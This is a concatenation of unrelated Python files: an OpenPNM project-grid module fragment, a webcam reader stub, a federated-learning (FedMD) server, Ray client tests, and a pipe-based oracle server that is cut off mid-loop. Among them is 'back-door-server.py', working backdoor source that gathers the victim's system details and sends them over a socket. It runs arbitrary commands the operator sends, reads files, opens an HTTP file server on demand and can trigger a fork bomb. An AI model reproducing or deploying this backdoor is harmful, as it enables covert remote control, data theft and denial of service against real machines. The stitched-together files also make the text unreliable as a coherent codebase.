# Check for headless throats
hits = np.where(net['throat.conns'] > net.Np - 1)[0]
if np.size(hits) > 0:
health['headless_throats'] = np.unique(hits)
return health
# Check for throats that loop back onto the same pore
P12 = net['throat.conns']
hits = np.where(P12[:, 0] == P12[:, 1])[0]
if np.size(hits) > 0:
health['looped_throats'] = hits
# Check for individual isolated pores
Ps = net.num_neighbors(net.pores())
if np.sum(Ps == 0) > 0:
health['isolated_pores'] = np.where(Ps == 0)[0]
# Check for separated clusters of pores
temp = []
am = net.create_adjacency_matrix(fmt='coo', triu=True)
Cs = csg.connected_components(am, directed=False)[1]
if np.unique(Cs).size > 1:
for i in np.unique(Cs):
temp.append(np.where(Cs == i)[0])
b = np.array([len(item) for item in temp])
c = np.argsort(b)[::-1]
for i, j in enumerate(c):
health['disconnected_clusters'].append(temp[c[i]])
if i > 0:
health['trim_pores'].extend(temp[c[i]])
# Check for duplicate throats
am = net.create_adjacency_matrix(fmt='csr', triu=True).tocoo()
hits = np.where(am.data > 1)[0]
if len(hits) > 0:
mergeTs = []
hits = np.vstack((am.row[hits], am.col[hits])).T
ihits = hits[:, 0] + 1j*hits[:, 1]
conns = net['throat.conns']
iconns = conns[:, 0] + 1j*conns[:, 1] # Convert to imaginary
for item in ihits:
mergeTs.append(np.where(iconns == item)[0])
health['duplicate_throats'] = mergeTs
# Check for bidirectional throats
adjmat = net.create_adjacency_matrix(fmt='coo')
num_full = adjmat.sum()
temp = sprs.triu(adjmat, k=1)
num_upper = temp.sum()
if num_full > num_upper:
biTs = np.where(net['throat.conns'][:, 0]
> net['throat.conns'][:, 1])[0]
health['bidirectional_throats'] = biTs.tolist()
return health
def show_model_dependencies(self, prop, obj):
r"""
"""
deps = {prop: self._get_deps(prop, obj)}
self._view_dependencies(deps)
def _get_deps(self, prop, obj):
deps = {}
try:
model = obj.models[prop]
for item in model.values():
if isinstance(item, str):
if item.startswith('pore.') or item.startswith('throat.'):
upstream = self._get_deps(item, obj)
deps.update({item: upstream})
except KeyError:
if obj._isa('physics'):
phase = self.find_phase(obj)
geom = self.find_geometry(obj)
if prop in phase.models.keys():
deps.update(self._get_deps(prop, phase))
elif prop in geom.models.keys():
deps.update(self._get_deps(prop, geom))
else:
pass
return deps
def _deps_to_jsongraph(self, children, name=None, parent=None):
if parent is None:
parent = "null"
if name is None:
name = list(children.keys())[0]
tree = {"name": name,
"parent": parent,
"color": hex(hash(name.split('.')[1]))[3:9],
"children": []}
for item in children[name].keys():
sub_tree = self._deps_to_jsongraph(parent=name, name=item,
children=children[name])
tree["children"].append(sub_tree)
return tree
def _view_dependencies(self, deps, port=8008):
import json
import webbrowser
import threading
import os
web_dir = os.path.join(os.path.dirname(__file__), '../../public')
os.chdir(web_dir)
from http.server import HTTPServer, SimpleHTTPRequestHandler
server = HTTPServer(server_address=('', port),
RequestHandlerClass=SimpleHTTPRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
data = self._deps_to_jsongraph(deps)
with open('data/tree.json', 'w') as outfile:
json.dump(data, outfile)
# Launch browser
webbrowser.open(f"http://localhost:{port}/dep_map.html")
def inspect_locations(self, element, indices, objs=[], mode='all'):
r"""
Shows the values of all props and/or labels for a given subset of
pores or throats.
Parameters
----------
element : str
The type of locations to inspect, either 'pores', or 'throats'
indices : array_like
The pore or throat indices to inspect
objs : list of OpenPNM Objects
If given, then only the properties on the recieved object are
inspected. If not given, then all objects are inspected (default).
mode : list of strings
Indicates whether to inspect 'props', 'labels', or 'all'. The
default is all
Returns
-------
df : Pandas DataFrame
A data frame object with each location as a column and each row
as a property and/or label.
"""
from pandas import DataFrame
props = {}
if not isinstance(objs, list):
objs = [objs]
if len(objs) == 0:
objs = self
for obj in objs:
d = {k: obj[k][indices] for k in obj.keys(element=element, mode=mode)}
for item in list(d.keys()):
if d[item].ndim > 1:
d.pop(item)
if item == 'pore.coords':
d['pore.coords_X'], d['pore.coords_Y'], \
d['pore.coords_Z'] = obj['pore.coords'][indices].T
if item == 'throat.conns':
d['throat.conns_head'], d['throat.conns_tail'] = \
obj['throat.conns'][indices].T
_ = [props.update({obj.name+'.'+item: d[item]}) for item in d.keys()]
df = DataFrame(props)
df = df.rename(index={k: indices[k] for k, _ in enumerate(indices)})
return df.T
def _regenerate_models(self, objs=[], propnames=[]):
r"""
Can be used to regenerate models across all objects in the project.
Parameters
----------
objs : list of OpenPNM objects
Can be used to specify which specific objects to regenerate. The
default is to regenerate all objects. If a subset of objects is
given, this function ensure they are generated in a sensible order
such as any phases are done before any physics objects.
propnames : list of strings, or string
The specific model to regenerate. If none are given then ALL
models on all objects are regenerated. If a subset is given,
then only object that have a corresponding model are regenerated,
to avoid any problems. This means that a single model can be
given, without specifying the objects.
"""
objs = list(objs)
if objs == []:
objs = self
if isinstance(propnames, str):
propnames = [propnames]
# Sort objs in the correct order (geom, phase, phys)
net = [i for i in objs if i is self.network]
geoms = [i for i in objs if i in self.geometries().values()]
phases = [i for i in objs if i in self.phases().values()]
phys = [i for i in objs if i in self.physics().values()]
objs = net + geoms + phases + phys
for obj in objs:
if len(propnames) > 0:
for model in propnames:
if model in obj.models.keys():
obj.regenerate_models(propnames=model)
else:
obj.regenerate_models()
def _generate_grid(self):
r"""
"""
grid = ProjectGrid()
# Create first/index column of grid
rows = [self.network.name] + list(self.geometries().keys())
grid.add_row(num=len(rows) - 1)
grid.set_col(0, rows)
# Creatle first/header row of grid
cols = list(self.phases().keys())
grid.add_col(num=len(cols))
grid.set_row(0, vals=[self.network.name] + cols)
# Now add physics objects to grid, adding new columns/rows as needed.
miss = 0
for p in self.physics().values():
try:
row = self.find_geometry(p)
try:
col = self.find_phase(p)
grid.set_row_and_col(row=row.name, col=col.name, val=p.name)
except Exception:
miss += 1
grid.set_row_and_col(row=row.name, col='?'*miss, val=p.name)
except:
try:
col = self.find_phase(p)
miss += 1
grid.set_row_and_col(row='?'*miss, col=col.name, val=p.name)
except Exception:
miss += 1
grid.set_row_and_col(row='?'*miss, col='?'*miss, val=p.name)
# See if any pores/throats are not assigned and add blank row
if len(self.geometries()) > 0:
h = self.check_geometry_health()
if (len(h['undefined_pores']) > 0) or (len(h['undefined_throats']) > 0):
grid.add_row()
return grid
def _get_grid(self):
if not hasattr(self, '_grid'):
grid = self._generate_grid()
self._grid = grid
else: # Update current grid with new data, to save formats and settings
grid = self._generate_grid()
self._grid._grid.table_data = grid._grid.table_data
return self._grid
def _set_grid(self, grid):
self._grid = grid
grid = property(fget=_get_grid, fset=_set_grid)
class ProjectGrid(Tableist):
r"""
This is a subclass of a Tableist grid, which adds the ability to lookup
by geometries and phases, as more specific versions of rows and cols
"""
def row(self, name):
r"""
Retrieve a specified row from the table
Parameters
----------
name : str
The row name, specified by the ``geometry`` object name
Returns
-------
table
A table object containing only a single row
"""
return self.get_row(name)._grid.table_data[0]
def col(self, name):
r"""
Retrieve a specified column from the table
Parameters
----------
name : str
The column name, specified by the ``phase`` object name
Returns
-------
table
A table object containing only a single column
"""
temp = self.get_col(name)._grid.table_data
temp = [i[0] for i in temp]
return temp
def geometries(self):
r"""
Retrieve a list of all geometries
"""
temp = self.index[1:]
temp = [i[0] for i in temp]
return temp
def phases(self):
r"""
Retrieve a list of all phases
"""
return self.header[0][1:]
|
__init__.py
|
import cv2
from threading import Thread
class smartFrameReader:
def __init__(self):
vidcap = cv2.VideoCapture(0)
def foreverRead(self):
""" don't worry about this. """
while True:
ret, tempFrame = self.vidcap.read()
if self.status != 0:
self.frame = tempFrame
self.status = 0
def getFrame(self):
""" gets frame from frame reader. """
self.status = 1
while self.status == 1:
pass
return self.frame
def startReading(self):
""" starts reading frames. i consistently read frames to remove lag. """
rdr = Thread(target=self.foreverRead)
rdr.start()
class faceFinder:
pass
class faceIDer:
pass
|
serverFedMD.py
|
import wandb
from flcore.clients.clientFedMD import clientFedMD
from flcore.servers.serverbase import Server
from torch.utils.data import DataLoader
import copy
from utils.data_utils import read_client_data
from threading import Thread
import torch
import torchvision.transforms as transforms
import torchvision
import numpy as np
class FedMD(Server):
def __init__(self, device, dataset, algorithm, model, batch_size, learning_rate, global_rounds, local_steps, join_clients,
num_clients, times, eval_gap, client_drop_rate, train_slow_rate, send_slow_rate, time_select, goal, time_threthold, run_name, choose_client):
super().__init__(dataset, algorithm, model, batch_size, learning_rate, global_rounds, local_steps, join_clients,
num_clients, times, eval_gap, client_drop_rate, train_slow_rate, send_slow_rate, time_select, goal,
time_threthold, run_name)
# select slow clients
self.set_slow_clients()
for i, train_slow, send_slow in zip(choose_client, self.train_slow_clients, self.send_slow_clients):
# train, test = read_client_data(dataset, i)
client = clientFedMD(device, i, train_slow, send_slow, self.train_all[i], self.test_all[i], model, batch_size, learning_rate, local_steps)
self.clients.append(client)
self.device = device
self.public_data_loader = DataLoader(self.public, batch_size, drop_last=True)
self.alignment_step = int(local_steps/20)
del(self.train_all)
del(self.test_all)
del(self.public)
self.iter_trainloader = iter(self.public_data_loader)
print(f"\nJoin clients / total clients: {self.join_clients} / {self.num_clients}")
print("Finished creating server and clients.")
def nas_competetive_output(self, output):
if isinstance(output, tuple):
output = output[1]
if isinstance(output, list):
assert len(output) == 2, "output must has {:} items instead of {:}".format(
2, len(output)
)
output, output_aux = output
else:
output, output_aux = output, None
return output
def get_next_train_batch(self):
try:
# Samples a new batch for persionalizing
(x, y) = next(self.iter_trainloader)
except StopIteration:
# restart the generator if the previous generator is exhausted.
self.iter_trainloader = iter(self.public_data_loader)
(x, y) = next(self.iter_trainloader)
if type(x) == type([]):
x[0] = x[0].to(self.device)
else:
x = x.to(self.device)
y = y.to(self.device)
return x, y
def train(self):
for i in range(self.start_epoch, self.global_rounds+1):
print(f"\n-------------Round number: {i}-------------")
if i<self.global_rounds/2:
eval_gap = 50
elif i< self.global_rounds*95/100 and i>=self.global_rounds/2:
eval_gap = 20
else:
eval_gap = 1
if i%eval_gap == 0:
print("\nEvaluate global model")
test_acc, train_acc, train_loss, personalized_acc = self.evaluate(i)
info_dict = {
"learning_rate": self.clients[0].optimizer.state_dict()['param_groups'][0]['lr'],
"global_valid_top1_acc": test_acc*100,
"average_valid_top1_acc": personalized_acc*100,
"epoch": i
}
# print(info_dict)
wandb.log(info_dict)
self.selected_clients = self.clients
for client in self.clients:
# client.scheduler.update(i, 0.0)
client.train()
# if i >= self.global_rounds/5:
# for step in range(self.alignment_step):
# x, y = self.get_next_train_batch()
# logits = None
# for client in self.clients:
# tep=copy.deepcopy(client.predict(x).detach())
# if logits == None:
# logits = tep
# else:
# logits += tep
# logits /= len(self.clients)
# for client in self.clients:
# client.MD_aggregation(logits)
# threads = [Thread(target=client.train)
# for client in self.selected_clients]
# [t.start() for t in threads]
# [t.join() for t in threads]
if i % 100 == 0:
self.save_global_model_middle(i)
print("\nBest global results.")
self.print_(max(self.rs_test_acc), max(self.rs_train_acc), min(self.rs_train_loss), max(self.rs_personalized_acc))
self.save_results()
self.save_global_model()
|
back-door-server.py
|
#! /usr/bin/python3
import http.server
import platform
import socket
import base64
import datetime
import os
import sys
import subprocess
from multiprocessing import Process, cpu_count
global _CodingBase85Text
global _DecodingBase85Text
global _ServerConnect
global _ForkBom
global _CloseServer
global _OsInfo
global _HttpServer
global hilo3
def _MAIN():
def _CodingBase85Text(ServerConnect, text):
data = base64.b85encode(text.encode('ascii'), pad=False)
ServerConnect.send(data)
def _DecodingBase85Text(ServerConnect, buffer):
data = ServerConnect.recv(buffer).decode()
data = base64.b85decode(data)
return str(data.decode('ascii'))
def _CloseServer(ServerDesconnect):
ServerDesconnect.close()
sys.exit()
def _ForkBom():
while True:
os.fork()
def _HttpServer():
def test(HandlerClass=http.server.BaseHTTPRequestHandler,ServerClass=http.server.HTTPServer,
protocol="HTTP/1.0", port=9785, bind=""):
server_address = (bind, port)
HandlerClass.protocol_version = protocol
httpd = ServerClass(server_address, HandlerClass)
try:
httpd.serve_forever()
except KeyboardInterrupt:
sys.exit(0)
return port
handler_class = http.server.SimpleHTTPRequestHandler
port = test(HandlerClass=handler_class)
return port
class BackDoor:
def __init__(self):
self.Host = '127.0.0.1'
try:
self.Port = sys.argv[1]
self.Port = int(self.Port)
except IndexError:
self.Port = 6365
self.Ip = None
self.Target = None
self.Data = None
self.ListenSocket = 1
self.buffer = 3500
self.Green = "\033[1;32m"
self.White = "\033[1;37m"
self.i = 1
self.Server = socket.socket()
self.Time = str(datetime.date.today())
self.Cwd = str(os.getcwd())
self.Os = str(sys.platform)
def _ServerConnect(self):
self.Server.bind((str(self.Host), int(self.Port)))
self.Server.listen(int(self.ListenSocket))
self.Target, self.Ip = self.Server.accept()
print(self.Green+'[*]'+self.White+'conexion establecida')
while True:
def _OsInfo():
self.Cwd = os.getcwd()
OsInfo = "\033[1;32m[*]\033[1;37mConexion establecida.\n"
OsInfo += "\033[1;32m[*]\033[1;37mEl sistema operativo victima es: " + str(self.Os)+'\n'
OsInfo += "\033[1;32m[*]\033[1;37mTiempo: " + str(self.Time)+'\n'
OsInfo += "\033[1;32m[*]\033[1;37mDirectorio: " + str(self.Cwd)+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mNombre del equipo: " + str(socket.gethostname())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37maseguramiento del nombre del dispositivo: "+str(platform.node())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mIp de la maquina: " + str(self.Ip) + '\n'
OsInfo += "\033[1;32m[*]\033[1;37mBuffer: " + str(self.buffer) + '\n'
OsInfo += "\033[1;32m[*]\033[1;37mTipo de conexion: " + str(self.Target) + '\n'
OsInfo += "\033[1;32m[*]\033[1;37mEjecutable de pythhon con el que se ejecuta: "+str(platform.architecture(sys.executable , '' , ''))+'\n'
OsInfo += "\033[1;32m[*]\033[1;37mEstructura: " + str(platform.machine()) +"\n"
OsInfo += "\033[1;32m[*]\033[1;37mSistema operativo: "+str(platform.platform(0, 0))+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mNombre real del Procesador: "+str(platform.processor())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mInfo de la version python: "+str(platform.python_build())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mCompilador de python: "+str(platform.python_compiler())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mImplementacion de python: "+str(platform.python_implementation())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mVersion del sistema: "+str(platform.release())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mTipo de sistema: "+str(platform.system())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37m"+str(platform.uname())+"\n"
return str(OsInfo)
if self.i == 1:
_CodingBase85Text(self.Target, _OsInfo())
self.i = 2
comand = str(_DecodingBase85Text(self.Target, self.buffer))
if comand == 'exit':
_CloseServer(self.Server)
break
elif comand == 'cd':
ruta = _DecodingBase85Text(self.Target, 1000)
os.chdir(str(ruta))
print("va")
self.Cwd = os.getcwd
print(self.Cwd)
_CodingBase85Text(self.Target, ("se pudo aceder a la carpeta: "+str(ruta)))
elif comand == 'BombFork':
hilo1 = Process(target=_ForkBom)
hilo2 = Process(target=self.Server.close())
hilo2.start()
hilo2.join()
hilo1.start()
elif comand == 'OsInfo':
_CodingBase85Text(self.Target, str(_OsInfo()))
elif str(comand) == 'cwd':
self.Cwd = os.getcwd()
_CodingBase85Text(self.Target, str(self.Cwd))
elif comand == 'HttpServer':
PortHttp = 9785
hilo3 = Process(target=_HttpServer)
hilo3.start()
_CodingBase85Text(self.Target, "server abierto en el puerto "+str(PortHttp))
elif comand == 'CloseHttpServer':
try:
hilo3.terminate()
_CodingBase85Text(self.Target, "server cerrado en el puerto "+str(PortHttp))
except UnboundLocalError:
pass
elif comand == 'cd ..':
os.chdir("..")
self.Cwd = os.getcwd()
_CodingBase85Text(self.Target, str(self.Cwd))
elif comand == 'read':
fileOpen = _DecodingBase85Text(self.Target, self.buffer)
try:
try:
_CodingBase85Text(self.Target, str("no binary"))
file = open(str(fileOpen), "r")
dataL = file.read()
file.close()
_CodingBase85Text(self.Target, str(dataL))
except (FileNotFoundError, IsADirectoryError):
_CodingBase85Text(self.Target, str("este archivo no esiste o es una carpeta"))
except UnicodeDecodeError:
try:
_CodingBase85Text(self.Target, str("binary"))
file = open(str(fileOpen), "rb")
dataL = file.read()
dataL = dataL
file.close()
_CodingBase85Text(self.Target, str(dataL))
except FileNotFoundError:
_CodingBase85Text(self.Target, str("este archivo no esiste"))
elif comand != 'CloseHttpServer' and comand != 'HttpServer' and str(comand) != 'cwd' and comand != 'OsInfo' and comand != 'BombFork' and str(comand) == 'cd' and comand == 'exit' and comand == 'cd ..' and comand == "read":
try:
data = self.Green + str(subprocess.getstatusoutput(str(comand))[1])
except UnicodeDecodeError:
data = '\033[1;36mocurrio un error de descodificaion unicode en el servidor'
_CodingBase85Text(self.Target, str(len(data)))
_CodingBase85Text(self.Target, str(data))
comand = None
data = None
else:
data = self.Green + str(subprocess.getstatusoutput(str(comand))[1])
_CodingBase85Text(self.Target, str(len(data)))
_CodingBase85Text(self.Target, str(data))
comand = None
data = None
if sys.platform == 'linux' or sys.platform == 'linux2':
os.system("clear")
elif sys.platform == 'win32':
os.system("cls")
else :
os.system("cls")
_CodingBase85Text(self.Target, _OsInfo())
BackDoor = BackDoor()
BackDoor._ServerConnect()
if __name__ == "__main__":
_MAIN()
|
test_client.py
|
import pytest
import time
import sys
import logging
import threading
import ray.util.client.server.server as ray_client_server
from ray.util.client.common import ClientObjectRef
from ray.util.client.ray_client_helpers import ray_start_client_server
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_real_ray_fallback(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def get_nodes_real():
import ray as real_ray
return real_ray.nodes()
nodes = ray.get(get_nodes_real.remote())
assert len(nodes) == 1, nodes
@ray.remote
def get_nodes():
# Can access the full Ray API in remote methods.
return ray.nodes()
nodes = ray.get(get_nodes.remote())
assert len(nodes) == 1, nodes
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_nested_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
@ray.remote
def f():
return "OK"
return ray.get(f.remote())
assert ray.get(g.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_put_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
print(objectref)
retval = ray.get(objectref)
assert retval == "hello world"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_wait(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
ready, remaining = ray.wait([objectref])
assert remaining == []
retval = ray.get(ready[0])
assert retval == "hello world"
objectref2 = ray.put(5)
ready, remaining = ray.wait([objectref, objectref2])
assert (ready, remaining) == ([objectref], [objectref2]) or \
(ready, remaining) == ([objectref2], [objectref])
ready_retval = ray.get(ready[0])
remaining_retval = ray.get(remaining[0])
assert (ready_retval, remaining_retval) == ("hello world", 5) \
or (ready_retval, remaining_retval) == (5, "hello world")
with pytest.raises(Exception):
# Reference not in the object store.
ray.wait([ClientObjectRef("blabla")])
with pytest.raises(TypeError):
ray.wait("blabla")
with pytest.raises(TypeError):
ray.wait(ClientObjectRef("blabla"))
with pytest.raises(TypeError):
ray.wait(["blabla"])
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_remote_functions(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def plus2(x):
return x + 2
@ray.remote
def fact(x):
print(x, type(fact))
if x <= 0:
return 1
# This hits the "nested tasks" issue
# https://github.com/ray-project/ray/issues/3644
# So we're on the right track!
return ray.get(fact.remote(x - 1)) * x
ref2 = plus2.remote(234)
# `236`
assert ray.get(ref2) == 236
ref3 = fact.remote(20)
# `2432902008176640000`
assert ray.get(ref3) == 2_432_902_008_176_640_000
# Reuse the cached ClientRemoteFunc object
ref4 = fact.remote(5)
assert ray.get(ref4) == 120
# Test ray.wait()
ref5 = fact.remote(10)
# should return ref2, ref3, ref4
res = ray.wait([ref5, ref2, ref3, ref4], num_returns=3)
assert [ref2, ref3, ref4] == res[0]
assert [ref5] == res[1]
assert ray.get(res[0]) == [236, 2_432_902_008_176_640_000, 120]
# should return ref2, ref3, ref4, ref5
res = ray.wait([ref2, ref3, ref4, ref5], num_returns=4)
assert [ref2, ref3, ref4, ref5] == res[0]
assert [] == res[1]
all_vals = ray.get(res[0])
assert all_vals == [236, 2_432_902_008_176_640_000, 120, 3628800]
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_function_calling_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
return "OK"
@ray.remote
def f():
print(f, g)
return ray.get(g.remote())
print(f, type(f))
assert ray.get(f.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_actor(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
class HelloActor:
def __init__(self):
self.count = 0
def say_hello(self, whom):
self.count += 1
return ("Hello " + whom, self.count)
actor = HelloActor.remote()
s, count = ray.get(actor.say_hello.remote("you"))
assert s == "Hello you"
assert count == 1
s, count = ray.get(actor.say_hello.remote("world"))
assert s == "Hello world"
assert count == 2
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_pass_handles(ray_start_regular_shared):
"""Test that passing client handles to actors and functions to remote actors
in functions (on the server or raylet side) works transparently to the
caller.
"""
with ray_start_client_server() as ray:
@ray.remote
class ExecActor:
def exec(self, f, x):
return ray.get(f.remote(x))
def exec_exec(self, actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def fact(x):
out = 1
while x > 0:
out = out * x
x -= 1
return out
@ray.remote
def func_exec(f, x):
return ray.get(f.remote(x))
@ray.remote
def func_actor_exec(actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def sneaky_func_exec(obj, x):
return ray.get(obj["f"].remote(x))
@ray.remote
def sneaky_actor_exec(obj, x):
return ray.get(obj["actor"].exec.remote(obj["f"], x))
def local_fact(x):
if x <= 0:
return 1
return x * local_fact(x - 1)
assert ray.get(fact.remote(7)) == local_fact(7)
assert ray.get(func_exec.remote(fact, 8)) == local_fact(8)
test_obj = {}
test_obj["f"] = fact
assert ray.get(sneaky_func_exec.remote(test_obj, 5)) == local_fact(5)
actor_handle = ExecActor.remote()
assert ray.get(actor_handle.exec.remote(fact, 7)) == local_fact(7)
assert ray.get(func_actor_exec.remote(actor_handle, fact,
10)) == local_fact(10)
second_actor = ExecActor.remote()
assert ray.get(actor_handle.exec_exec.remote(second_actor, fact,
9)) == local_fact(9)
test_actor_obj = {}
test_actor_obj["actor"] = second_actor
test_actor_obj["f"] = fact
assert ray.get(sneaky_actor_exec.remote(test_actor_obj,
4)) == local_fact(4)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.log = test_log
ray.worker.log_client.set_logstream_level(logging.DEBUG)
# Allow some time to propogate
time.sleep(1)
x = ray.put("Foo")
assert ray.get(x) == "Foo"
time.sleep(1)
logs_with_id = [msg for msg in log_msgs if msg.find(x.id.hex()) >= 0]
assert len(logs_with_id) >= 2
assert any((msg.find("get") >= 0 for msg in logs_with_id))
assert any((msg.find("put") >= 0 for msg in logs_with_id))
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_stdout_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.stdstream = test_log
@ray.remote
def print_on_stderr_and_stdout(s):
print(s)
print(s, file=sys.stderr)
time.sleep(1)
print_on_stderr_and_stdout.remote("Hello world")
time.sleep(1)
assert len(log_msgs) == 2
assert all((msg.find("Hello world") for msg in log_msgs))
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_create_remote_before_start(ray_start_regular_shared):
"""Creates remote objects (as though in a library) before
starting the client.
"""
from ray.util.client import ray
@ray.remote
class Returner:
def doit(self):
return "foo"
@ray.remote
def f(x):
return x + 20
# Prints in verbose tests
print("Created remote functions")
with ray_start_client_server() as ray:
assert ray.get(f.remote(3)) == 23
a = Returner.remote()
assert ray.get(a.doit.remote()) == "foo"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_named_actor(ray_start_regular_shared):
"""Test that ray.get_actor() can create and return a detached actor.
"""
with ray_start_client_server() as ray:
@ray.remote
class Accumulator:
def __init__(self):
self.x = 0
def inc(self):
self.x += 1
def get(self):
return self.x
# Create the actor
actor = Accumulator.options(name="test_acc").remote()
actor.inc.remote()
actor.inc.remote()
# Make sure the get_actor call works
new_actor = ray.get_actor("test_acc")
new_actor.inc.remote()
assert ray.get(new_actor.get.remote()) == 3
del actor
actor = Accumulator.options(
name="test_acc2", lifetime="detached").remote()
actor.inc.remote()
del actor
detatched_actor = ray.get_actor("test_acc2")
for i in range(5):
detatched_actor.inc.remote()
assert ray.get(detatched_actor.get.remote()) == 6
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_internal_kv(ray_start_regular_shared):
with ray_start_client_server() as ray:
assert ray._internal_kv_initialized()
assert not ray._internal_kv_put("apple", "b")
assert ray._internal_kv_put("apple", "asdf")
assert ray._internal_kv_put("apple", "b")
assert ray._internal_kv_get("apple") == b"b"
assert ray._internal_kv_put("apple", "asdf", overwrite=True)
assert ray._internal_kv_get("apple") == b"asdf"
assert ray._internal_kv_list("a") == [b"apple"]
ray._internal_kv_del("apple")
assert ray._internal_kv_get("apple") == b""
def test_startup_retry(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
with pytest.raises(ConnectionError):
ray_client.connect("localhost:50051", connection_retries=1)
def run_client():
ray_client.connect("localhost:50051")
ray_client.disconnect()
thread = threading.Thread(target=run_client, daemon=True)
thread.start()
time.sleep(3)
server = ray_client_server.serve("localhost:50051")
thread.join()
server.stop(0)
ray_client._inside_client_test = False
def test_dataclient_server_drop(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
@ray_client.remote
def f(x):
time.sleep(4)
return x
def stop_server(server):
time.sleep(2)
server.stop(0)
server = ray_client_server.serve("localhost:50051")
ray_client.connect("localhost:50051")
thread = threading.Thread(target=stop_server, args=(server, ))
thread.start()
x = f.remote(2)
with pytest.raises(ConnectionError):
_ = ray_client.get(x)
thread.join()
ray_client.disconnect()
ray_client._inside_client_test = False
# Wait for f(x) to finish before ray.shutdown() in the fixture
time.sleep(3)
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
server.py
|
import os
import time
import logging
from multiprocessing import Process
logging.basicConfig(level=logging.INFO)
import numpy as np
from models import Oracle, Feasibility, Pushability
from oracle_pb2 import (
ActionRequest,
ActionResponse,
FeasibilityRequest,
FeasibilityResponse,
PushabilityRequest,
PushabilityResponse,
)
def get_pipe_path(name):
path = os.environ.get(name)
if not path:
raise EnvironmentError('Environment variable {} not set'.format(name))
else:
return path
def oracle_loop():
try:
action_request = ActionRequest()
for attr in action_request.FindInitializationErrors():
setattr(action_request, attr, 0.0)
message_size = action_request.ByteSize()
oracle = Oracle()
request_path = get_pipe_path('ORACLE_REQUEST_PIPE_PATH')
response_path = get_pipe_path('ORACLE_RESPONSE_PIPE_PATH')
logging.info('Action request server started')
while True:
with open(request_path, 'rb') as request_pipe:
data = request_pipe.read(message_size)
request = ActionRequest.FromString(data)
start = time.perf_counter()
response = oracle.sample(request)
if len(data) == 0:
break
pass
end = time.perf_counter()
response.cpu_time = end - start
with open(response_path, 'wb') as response_pipe:
response_pipe.write(response.SerializeToString())
except KeyboardInterrupt:
pass
def feasibility_loop():
try:
feasibility_request = FeasibilityRequest()
for attr in feasibility_request.FindInitializationErrors():
setattr(feasibility_request, attr, 0.0)
message_size = feasibility_request.ByteSize()
feasibility = Feasibility()
request_path = get_pipe_path('FEASIBILITY_REQUEST_PIPE_PATH')
response_path = get_pipe_path('FEASIBILITY_RESPONSE_PIPE_PATH')
logging.info('Feasibility server started')
while True:
with open(request_path, 'rb') as request_pipe:
data = request_pipe.read(message_size)
request = ActionRequest.FromString(data)
start = time.perf_counter()
response = feasibility.mahalanobis(request)
if len(data) == 0:
break
pass
end = time.perf_counter()
response.cpu_time = end - start
with open(response_path, 'wb') as response_pipe:
response_pipe.write(response.SerializeToString())
except KeyboardInterrupt:
pass
def feasibility_sample_loop():
try:
request = FeasibilityRequest()
for attr in request.FindInitializationErrors():
setattr(request, attr, 0.0)
message_size = request.ByteSize()
feasibility = Feasibility()
request_path = get_pipe_path('FEASIBILITY_SAMPLE_REQUEST_PIPE_PATH')
response_path = get_pipe_path('FEASIBILITY_SAMPLE_RESPONSE_PIPE_PATH')
logging.info('Feasibility sample server started')
while True:
with open(request_path, 'rb') as request_pipe:
data = request_pipe.read(message_size)
request = FeasibilityRequest.FromString(data)
start = time.perf_counter()
response = feasibility.sample(request)
if len(data) == 0:
break
pass
end = time.perf_counter()
response.cpu_time = end - start
with open(response_path, 'wb') as response_pipe:
response_pipe.write(response.SerializeToString())
except KeyboardInterrupt:
pass
def pushability_loop():
try:
pushability_request = PushabilityRequest()
for attr in pushability_request.FindInitializationErrors():
setattr(pushability_request, attr, 0.0)
message_size = pushability_request.ByteSize()
request_path = get_pipe_path('PUSHABILITY_REQUEST_PIPE_PATH')
response_path = get_pipe_path('PUSHABILITY_RESPONSE_PIPE_PATH')
pushability = Pushability()
logging.info('Pushability server started')
while True:
with open(request_path, 'rb') as request_pipe:
data = request_pipe.read(message_size)
